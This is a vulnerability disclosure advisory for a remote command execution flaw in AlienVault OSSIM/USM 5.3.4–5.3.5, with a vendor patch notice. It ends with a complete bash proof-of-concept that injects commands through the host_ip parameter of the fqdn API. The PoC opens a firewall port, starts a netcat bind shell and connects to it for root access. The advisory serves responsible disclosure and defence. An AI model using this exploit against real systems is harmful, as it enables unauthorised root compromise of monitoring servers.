SSD Advisory – AlienVault OSSIM / USM Remote Command Execution

Vulnerability Summary
The following advisory describes a Remote Command Execution vulnerability found in AlientVault OSSIM and USM version 5.3.4 and version 5.3.5.
OSSIM, AlienVault’s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. Launched by security engineers because of the lack of available open source products, OSSIM was created specifically to address the reality many security professionals face: A SIEM, whether it is open source or commercial, is virtually useless without the basic security controls necessary for security visibility.
AlienVault Unified Security Management (USM) is a comprehensive approach to security monitoring, delivered in a unified platform. The USM platform includes five essential security capabilities that provide resource-constrained organizations with all the security essentials needed for effective threat detection, incident response, and compliance, in a single pane of glass.
Designed to monitor cloud, hybrid cloud and on-premises environments, AlienVault USM significantly reduces complexity and deployment time so that you can go from installation to first insight in minutes – talk about fast threat detection!
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor Responses
“We have confirmed that this issue impacts v5.3.4 and v5.3.5 of OSSIM and USM. As a result, we will be pushing a hotfix release (v5.3.6) to all users which will patch this vulnerability” for more details you can see the release notes released here: https://www.alienvault.com/forums/discussion/8415/alienvault-v5-3-6-hotfix-important-update

Vulnerability Details
The vulnerability can be found in the default installation without any plugins. The function get_fqdn don’t validate user input.
The function get_fqdn execute nslookup (executable=/bin/bash nslookup) with parameter (%s), when %s is the host_ip in the control of user. A user can concatenate commands to run by adding “;” to the “host_ip” parameter.
Proof Of Concept:

#!/bin/bash
usage() {
echo "Usage: $0 <ip>"
}
info() {
echo "[+] $1"
}
if [ -z "$1" ]; then
usage >&1
exit 1
fi
IP="$1"
PORT=8888
nohup curl -ks -XPOST -d \
'host_ip=127.0.0.1;\
iptables-save > /tmp/.rules;\
iptables -I INPUT -p tcp --dport '$PORT' -j ACCEPT;\
mkfifo /tmp/ncshell;\
sh /tmp/ncshell | nc -l -p '$PORT' > /tmp/ncshell;\
rm -f /tmp/ncshell;\
iptables-restore < /tmp/.rules;\
rm -f /tmp/.rules' \
"https://$IP:40011/av/api/1.0/system/local/network/fqdn" >/dev/null 2>&1 &
info "Exploit running..."
sleep 2
info 'Now you should have your root shell: (^D to exit)'
rc=0
nc $IP $PORT
info 'Terminated'</ip>
Comments
Comments are closed.